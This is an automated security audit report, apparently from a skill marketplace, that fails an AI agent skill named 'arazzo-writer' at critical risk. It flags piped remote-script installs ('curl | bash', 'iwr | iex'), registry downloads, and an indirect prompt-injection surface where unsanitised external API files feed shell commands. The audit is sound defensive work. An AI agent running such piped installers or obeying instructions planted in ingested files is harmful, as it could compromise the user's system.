arazzo-writer
Fail
Audited by Gen Agent Trust Hub on Mar 7, 2026
Risk Level: CRITICALREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONEXTERNAL_DOWNLOADSPROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION]: The SKILL.md file directs the agent to execute discovery commands like 'command -v', 'which', and 'where', and to run validation tools ('openapi arazzo validate') as part of its internal reasoning loop.
- [REMOTE_CODE_EXECUTION]: The skill instructs the agent to follow installation guides in the references directory that use dangerous piped remote execution patterns such as 'curl | bash' and 'iwr | iex' from go.speakeasy.com.
- [EXTERNAL_DOWNLOADS]: The skill downloads and installs various tools and packages from external registries like NPM, PyPI, and GitHub, which are used during the automated validation process.
- [PROMPT_INJECTION]: The skill presents an indirect prompt injection surface. Ingestion points: External Arazzo and OpenAPI files processed by the agent. Boundary markers: None identified in the instructions. Capability inventory: Execution of shell commands ('openapi', 'python') using data from the ingested files. Sanitization: No input validation or sanitization of file paths or contents before command execution is mentioned.
Recommendations
- AI detected serious security threats
Audit Metadata